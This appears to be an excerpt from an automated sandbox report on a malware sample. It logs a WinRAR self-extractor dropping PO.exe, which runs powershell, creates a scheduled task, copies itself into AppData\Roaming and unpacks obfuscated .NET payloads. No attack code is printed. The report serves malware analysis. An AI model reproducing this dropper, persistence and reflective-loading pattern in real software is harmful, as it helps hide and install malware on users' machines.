Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Section loaded: windowscodecs.dll

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: w4XFffGDz1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: w4XFffGDz1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: w4XFffGDz1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: w4XFffGDz1.exe

Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: w4XFffGDz1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: PO.exe.0.dr, MainForm.cs	.Net Code: InitializeComponent
Source: AJzHYZtQIb.exe.7.dr, MainForm.cs	.Net Code: InitializeComponent
Source: 7.2.PO.exe.29ee27c.0.raw.unpack, LoginForm.cs	.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs	.Net Code: PFORYJkYX8 System.Reflection.Assembly.Load(byte[])
Source: 7.2.PO.exe.7770000.7.raw.unpack, LoginForm.cs	.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs	.Net Code: PFORYJkYX8 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6362281

Jump to behavior

Source: w4XFffGDz1.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018C403 push ecx; ret
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018D4B0 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 14_2_0697E5CF push es; ret
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_07AA9695 push FFFFFF8Bh; iretd
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Code function: 16_2_08D48D0B push esp; retf

Source: PO.exe.0.dr	Static PE information: section name: .text entropy: 7.616094055788291
Source: AJzHYZtQIb.exe.7.dr	Static PE information: section name: .text entropy: 7.616094055788291

Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, vDrWgAuv05qGryjBLgI.cs	High entropy of concatenated method names: 'DLaFo6BeZC', 'Ub7FfGRIXv', 'nPFFYt388V', 'PFnFjKo1l8', 'Iq6F4UlDFo', 'KRVFVmgGIK', 'EXHFB125LY', 'odhFDtYdQ9', 'HFyFart8dd', 'boFFEaBFC0'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, p7yy0t7M82Hmx79AfL.cs	High entropy of concatenated method names: 'ToString', 'AI3i2Ye5u9', 'eXViKhcoox', 'EGBix93HrW', 'htBivmf4cA', 'C19iPp4DgV', 'jE2iWdmjCN', 'jWuiso0GQd', 'r5dih1ZFjl', 'PU3iIjMRc1'
Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, q72tq2ximplPDGFyoN.cs	High entropy of concatenated method names: 'Dispose', 'mBh9SJB4AZ', 'McfkKR4SMR', 'v9vGGDVhm2', 'V5h9LuFiD4', 'zXR9zpUKmf', 'ProcessDialogKey', 'iy2k7To6Ne', 'suAk9fVRd1', 'h46kkDn1FB'
